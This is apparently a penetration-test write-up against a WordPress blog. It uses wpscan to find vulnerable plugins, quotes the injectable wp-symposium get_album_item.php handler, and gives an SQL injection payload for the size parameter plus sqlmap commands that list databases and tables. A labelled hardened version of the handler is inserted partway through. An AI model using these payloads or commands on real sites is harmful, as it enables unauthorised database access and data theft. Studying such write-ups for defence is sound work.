WordPress Plugin Penetration Testing

0x00 Information Gathering

The target URL is a WordPress blog. The server header reads:

Apache/2.4.10 (Debian)

Since it is WordPress, the obvious first step is a wpscan run.

[+] We found 2 plugins:

[+] Name: akismet
| Latest version: 3.3.4
| Location: http://218.2.197.234:2040/wp-content/plugins/akismet/

[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8215
Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: wp-symposium - v15.1
| Location: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/
| Readme: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/readme.txt
[!] The version is out of date, the latest version is 15.8.1

Two outdated plugins were found, both with known vulnerabilities.

[!] Title: WP Symposium <= 15.1 - SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/7902
Reference: http://permalink.gmane.org/gmane.comp.security.oss.general/16479
Reference: http://packetstormsecurity.com/files/131801/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3325
Reference: https://www.exploit-db.com/exploits/37080/
[i] Fixed in: 15.4

[!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8140
Reference: https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522
Reference: https://www.exploit-db.com/exploits/37824/
[i] Fixed in: 15.8

[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8148
Reference: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
[i] Fixed in: 15.8

0x01 Exploitation

The SQL injection in CVE-2015-3325 lives in get_album_item.php of the wp-symposium plugin:

<?php
// Vulnerable handler from wp-symposium's get_album_item.php: $size is
// concatenated straight into the column list, so the request controls the
// SELECT expression. Only $iid is passed through $wpdb->prepare().
include_once('../../../wp-config.php');
global $wpdb;
$iid = $_REQUEST['iid'];
$size = $_REQUEST['size'];
$sql = "SELECT ".$size." FROM ".$wpdb->base_prefix."symposium_gallery_items WHERE iid = %d";
$image = $wpdb->get_var($wpdb->prepare($sql, $iid));
header("Content-type: image/jpeg");
echo stripslashes($image);
?>

By crafting the size parameter you control the SQL query, and the code applies no filtering at all. However, when I queried column names with a table_name restriction, nothing came back; and without the table_name restriction the response is capped at 1 KB by the file-size limit, so the wp_users column names never appeared.

?size=group_concat(column_name) FROM information_schema.columns WHERE table_schema=database() and table_name=%27users%27%20;%20--
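Below is an added example, not the plugin's own patch, of how the get_album_item.php handler above can be hardened: the user-supplied size value is used only as a key into a fixed whitelist of column names, so no request data is ever concatenated into the SQL, and iid is cast to an integer before it is bound. The column names thumb_image, medium_image and full_image in the whitelist are hypothetical placeholders standing in for the plugin's real columns.

```php
<?php
// Added example, not the plugin's own code: hardened version of the
// get_album_item.php logic. The column names in $allowed_sizes are
// hypothetical placeholders; a real fix would list the plugin's actual
// image columns.
include_once('../../../wp-config.php');
global $wpdb;

// Whitelist: the request value is only a lookup key. The identifier that
// reaches the query comes from this array, never from the request.
$allowed_sizes = array(
    'thumb'  => 'thumb_image',   // hypothetical column names
    'medium' => 'medium_image',
    'full'   => 'full_image',
);

$size_key = isset($_REQUEST['size']) ? (string) $_REQUEST['size'] : '';
if (!array_key_exists($size_key, $allowed_sizes)) {
    status_header(400);   // WordPress core helper, available after wp-config.php
    exit('invalid size');
}
$column = $allowed_sizes[$size_key];

// iid is cast to int in addition to the %d placeholder, so a non-numeric or
// non-positive value is rejected before it reaches the database layer.
$iid = isset($_REQUEST['iid']) ? (int) $_REQUEST['iid'] : 0;
if ($iid <= 0) {
    status_header(400);
    exit('invalid iid');
}

// Only the whitelisted identifier is interpolated; the value is bound.
$sql = "SELECT `{$column}` FROM {$wpdb->base_prefix}symposium_gallery_items WHERE iid = %d";
$image = $wpdb->get_var($wpdb->prepare($sql, $iid));

if ($image === null) {
    status_header(404);
    exit;
}
header('Content-type: image/jpeg');
echo stripslashes($image);
```

With this shape the only way to change which column is read is to add an entry to $allowed_sizes in the source, which is what a code review should expect to see for any identifier derived from a request.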

With no way forward, I gave up on this vulnerability and turned to the blind-injection CVE instead.

https://www.exploit-db.com/exploits/37822/

The topic_id parameter is blind-injectable. Open the corresponding page, save the POST request to a file, and test it with sqlmap. (During testing I had not removed the sleep function from the exploit, so the script ran for far longer than it needed to...)

sqlmap -r "E:1.txt" --dbs --level 3

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] wordpress

Table names:

sqlmap -r "E:1.txt" -D "wordpress" --tables
